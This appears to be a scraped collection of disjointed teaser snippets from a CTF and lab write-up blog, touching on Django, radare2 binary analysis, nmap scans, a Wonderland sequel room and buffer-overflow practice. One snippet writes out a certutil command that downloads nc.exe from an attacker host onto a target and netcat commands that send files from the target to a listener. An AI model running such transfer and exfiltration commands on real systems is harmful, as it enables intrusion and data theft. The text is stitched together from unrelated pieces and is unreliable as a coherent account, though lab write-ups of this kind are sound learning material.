All my findings of Django will be updated here.
Make sure you have python3 install on your computer.
Make sure you have a code editor and preferrable to have visual studio code.
I found several ports open like 21, 22 & 1337.
This is a simple writeup by my team H0j3n.
Coded_VI
I’m using radare2 to analyze the binary. By looking at the main I found a strings Tranqulat3d which could be the argument needed but its not the right one
pdf @main
By nmap I found 2 ports open
September sure will be busy so let’s pwn some boxes in HTB and training❤
Step through the looking glass. A sequel to the Wonderland challenge room.
Let’s do nmap first and see what do we get.
There are thousands port are open within range of 9000 to 14000
Since there are thousands of ports are open and all of these are ssh. Let's try manual first instead of doing the automation script. When we ssh to a port there is two outputs that we will get which Higher and Lower.
Practice stack-based buffer overflows!
I did not use the RDP inside TryHackMe, instead, I download all the files needed on the machine and put in my own Windows.
First, upload our nc.exe on that machine because I can't find nc on the machine,
certutil -urlcache -f http://<IP>/nc.exe c:\Users\admin\Desktop\nc.exe
Then I just use NC to transfer files. I don't know how to transfer all directory so instead, I just transfer each one inside the vulnerable-apps directory.
#On Our Machine
nc -l -p 1234 > oscp.exe#On Target Machine
nc.exe -w 3 <IP> 1234 < vulnerable-apps\oscp\oscp.exe
Keep doing that and let’s do all of the OVERFLOW tasks :) I’m excited to learn BOF >.< …
The machine is designed to be a DC tribute but also a kind of real-life techniques container. You will find also a bunch of CTF style challenges. You need to have enough information about Linux enumeration, PTES and encryption for privileges escalation.
Let’s do nmap first and see what do we get.
22 tcp open ssh
80/tcp open http
83/tcp open http